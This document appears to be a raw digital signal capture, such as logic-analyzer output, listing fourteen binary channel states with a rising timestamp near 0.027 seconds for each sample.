1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7042796e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7042804e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.7042852e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7042876e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,2.7042880e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7042884e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7042900e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7042924e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,2.7042928e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7042932e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.7042972e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7043000e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043004e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7043024e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043048e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7043076e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043100e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7043124e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043148e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7043172e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043196e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7043204e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.7043252e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7043276e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043284e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7043300e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043324e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7043348e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043372e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7043400e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043424e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7043452e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043476e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7043500e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043524e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7043548e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043572e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7043580e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.7043624e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7043652e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,2.7043656e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043660e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7043676e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043700e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7043724e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043748e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7043756e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.7043800e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7043824e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043832e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7043852e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043876e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7043900e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043924e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7043948e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7043972e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7044000e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7044024e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7044052e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,2.7044076e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7044080e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.7044124e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7044148e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7044156e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7044172e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7044196e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7044224e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7044248e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7044276e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7044300e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7044324e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7044348e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7044352e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.7044400e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7044420e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7044432e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7044448e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,2.7044476e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7044480e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.7044524e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7044548e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7044556e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7044600e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7044620e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7044676e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7044700e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7044748e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7044772e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7044780e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.7044820e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7044852e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7044900e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7044924e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7044948e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7044972e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7044996e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045020e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7045028e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.7045076e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7045100e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045108e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045124e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045148e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045172e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045196e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045220e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045252e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045272e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045296e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045324e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045348e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045372e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045396e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045420e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045444e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045472e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045496e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045524e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045548e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045572e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045596e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045620e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045644e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045672e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045696e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045724e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045748e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045772e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045796e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045820e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045844e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045872e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045896e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045924e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045948e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7045972e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7045996e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046020e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046044e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046072e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046096e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046124e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046148e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046172e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046196e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046220e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046244e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046272e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046296e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046324e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046348e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046372e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046396e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046420e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046444e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046472e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046496e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046524e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046548e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046572e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046596e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046620e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046644e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046672e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046696e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046724e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046748e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046772e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046796e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046820e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046844e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046872e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046896e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046924e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046948e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7046972e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7046996e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047020e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047044e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047072e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047096e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047124e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047148e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047172e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047196e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047220e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047244e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047272e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047296e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047324e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047348e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047372e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047396e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047420e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047444e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047472e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047496e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047524e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047548e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047572e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047596e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047620e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047644e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047672e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047696e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047724e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047748e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047772e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047796e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047820e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047844e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047872e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047896e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047924e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047948e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7047972e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7047996e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7048020e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7048044e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7048072e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7048096e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7048124e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7048148e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7048172e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7048196e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7048220e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7048244e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7048272e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7048296e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7048324e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7048348e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7048372e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7048396e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7048420e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7048444e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7048476e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7048500e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7048524e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7048548e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7048572e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7048596e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,2.7173052e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,2.7173252e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,2.7173272e-02 0,1,1,1,1,0,0,0,0,0,0,1,0,1,2.7173300e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,2.7173324e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,2.7173636e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,2.7173660e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,2.7173664e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,1,2.7173708e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,2.7173732e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,2.7173740e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,2.7173756e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,2.7173780e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,2.7173788e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,1,2.7173832e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,2.7173860e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,1,2.7173864e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,2.7173868e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7173884e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7173908e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7173912e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7173956e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7173980e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7173988e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7174008e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7174032e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7174036e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7174084e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7174108e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7174116e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7174132e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7174156e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7174180e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7174204e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7174232e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7174256e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7174308e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7174332e-02 0,1,1,1,1,0,0,0,0,1,0,0,0,0,2.7174336e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7174340e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7174380e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7174408e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7174412e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7174432e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7174456e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7174460e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7174508e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7174532e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7174540e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7174556e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7174580e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7174604e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7174632e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7174656e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7174684e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7174708e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7174732e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7174736e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7174780e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7174808e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7174812e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7174832e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7174856e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7174860e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7174908e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7174932e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7174940e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7174956e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7174980e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7175004e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7175032e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7175056e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7175084e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7175132e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7175156e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7175164e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7175208e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7175232e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,2.7175236e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7175240e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7175260e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7175284e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7175332e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7175356e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7175380e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7175404e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7175432e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7175456e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7175484e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7175508e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7175532e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7175556e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7175564e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7175608e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7175632e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,2.7175636e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7175640e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7175660e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7175684e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7175708e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7175732e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7175736e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7175780e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7175808e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7175812e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7175832e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7175856e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7175884e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7175908e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7175932e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7175956e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7175980e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7176004e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7176032e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7176056e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7176060e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7176108e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7176132e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7176140e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7176180e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7176208e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7176232e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7176256e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7176284e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7176308e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7176332e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7176356e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7176364e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7176408e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7176432e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7176440e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7176460e-02 0,1,1,1,1,0,0,0,0,1,0,0,0,0,2.7176484e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7176488e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7176508e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7176532e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7176556e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7176580e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7176604e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7176632e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7176656e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7176684e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7176732e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7176756e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7176780e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7176804e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7176812e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7176832e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7176856e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7176884e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7176908e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7176912e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.7176956e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.7176980e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7176988e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177008e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177032e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177056e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177084e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177108e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177132e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177156e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.7177180e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.7177204e-02 